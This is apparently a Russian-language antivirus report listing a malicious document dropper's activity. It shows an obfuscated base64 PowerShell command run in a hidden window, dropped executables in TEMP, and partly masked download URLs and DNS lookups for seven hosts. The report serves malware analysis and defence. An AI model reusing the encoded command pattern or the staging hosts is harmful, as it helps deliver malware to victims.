Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABDAGsANgBrAHUAMAB5AD0AKAAoACcAVgA2AGYAJwArACcANwBjACcAKQArACcAdAAwACcAKQA7ACYAKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAEUAbgBWADoAdABlAG0AUABcAFcATwBSAGQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1568
- %TEMP%\842093.cvr
- %TEMP%\word\2019\sbvzhvg.exe
- %TEMP%\word\2019\sbvzhvg.exe
- 'le###.pri.ee':80
- 'me###opoly.com':80
- 'mi###eljunk.de':80
- 'mi###va-bg.net':80
- 'mi##na.de':80
- 'mi###lski.de':80
- 'mi###estudio.ro':80
- http://le###.pri.ee/melius/tv471975685/
- http://me###opoly.com/cgi-bin/Krt1152299/
- http://mi###eljunk.de/assets/file/HcQLJ/
- http://mi###va-bg.net/tutorials/attach/ntHZgJIgtRB/
- http://mi##na.de/cgi-bin/attach/LUHJFwPAGqOw/
- http://mi###lski.de/AdvancedGuestbook_01/uy0gyfv41428711/
- http://mi###estudio.ro/journal/attach/gCmLwZCcGjpMe/
- DNS ASK le###.pri.ee
- DNS ASK me###opoly.com
- DNS ASK mi###eljunk.de
- DNS ASK mi###va-bg.net
- DNS ASK mi##na.de
- DNS ASK mi###lski.de
- DNS ASK mi###estudio.ro
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABDAGsANgBrAHUAMAB5AD0AKAAoACcAVgA2AGYAJwArACcANwBjACcAKQArACcAdAAwACcAKQA7ACYAKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAEUAbgBWADoAdABlAG0AUABcAFcATwBSAGQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG...' (со скрытым окном)